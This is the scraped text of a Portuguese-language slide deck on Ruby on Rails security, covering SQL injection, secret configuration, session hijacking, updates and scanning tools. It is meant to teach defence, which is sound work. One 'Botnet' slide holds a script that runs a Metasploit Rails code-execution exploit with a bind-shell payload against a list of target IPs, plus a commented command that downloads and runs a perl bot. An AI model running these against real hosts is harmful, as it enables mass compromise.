Segurança on Rails

infoslack.com - @infoslack - github.com/infoslack

initsec.com

infoslack.com/livro

$ rails new project

Minha aplicação está segura ?

OWASP.org

SQL Injection Quem nunca ? User.where( “role = #{params[:role]}” )
Nunca interpole!

#FAIL email = “ ‘ OR 1) --” User.where(“ email
= ‘#{email}’ ”).first #=> #<User id: 1, email: “[email protected]”> #OK User.where(email: params[:email]) Para ver mais: http://rails-sqli.org/

Configs • não salve configs no repositório; • use variáveis
de ambiente; • inserir arquivo de config apenas na hora do deploy; • SECRET TOKEN / config/secrets.yml

Session Hijacking • cookies para identificação de users; ◦ hacker
pode roubar o cookie de um user • SSL em todo processo de autenticação; ◦ config.force_ssl = true • user inativo? ◦ expire a sessão! Mantenha tudo atualizado sempre!

Mesmo utilizando SSL tome cuidado!

Ainda tem muito mais! • Updates! ◦ Updates no server
(kernel); ◦ Updates nos softwares do server; ◦ Updates no framework; ◦ Updates nas dependências do projeto; ◦ Updates everywhere!

Como posso verificar? • Testando a segurança do meu código
#análise estática ◦ http://brakemanscanner.org/ ◦ https://codeclimate.com/ • Verificando atualizações: ◦ http://www.rubysec.com/ ◦ https://github.com/rubysec/ruby-advisory-db ◦ https://github.com/rubysec/bundler-audit ◦ https://hakiri.io/

hakiri.io/facets

Como posso testar ?

Show me!

Botnet #!/bin/sh TARGETS="ip-list.txt" CLI="metasploit-framework/msfcli" for host in $(cat $TARGETS) do
tmux new-window -n $host $CLI'\ multi/http/rails_xml_yaml_code_exec rhost='$host'\ payload=ruby/shell_bind_tcp E' done #wget -O - http://labs.infoslack.com/bot.pl > /tmp/bot.pl && perl /tmp/bot.pl

O que mais posso fazer ? • http://www.ubuntu.com/usn/ • https://www.ruby-lang.org/en/security/
• http://nginx.org/en/security_advisories.html • http://guides.rubyonrails.org/security.html

Segurança on Rails

Segurança on Rails

Daniel Romero

More Decks by Daniel Romero

Other Decks in Technology

Featured

Transcript

infoslack.com - @infoslack - github.com/infoslack

initsec.com

infoslack.com/livro

$ rails new project

Minha aplicação está segura ?

OWASP.org

SQL Injection Quem nunca ? User.where( “role = #{params[:role]}” )

#FAIL email = “ ‘ OR 1) --” User.where(“ email

Configs • não salve configs no repositório; • use variáveis

Session Hijacking • cookies para identificação de users; ◦ hacker

Mesmo utilizando SSL tome cuidado!

Ainda tem muito mais! • Updates! ◦ Updates no server

Como posso verificar? • Testando a segurança do meu código

hakiri.io/facets

Como posso testar ?

Show me!

Botnet #!/bin/sh TARGETS="ip-list.txt" CLI="metasploit-framework/msfcli" for host in $(cat $TARGETS) do

O que mais posso fazer ? • http://www.ubuntu.com/usn/ • https://www.ruby-lang.org/en/security/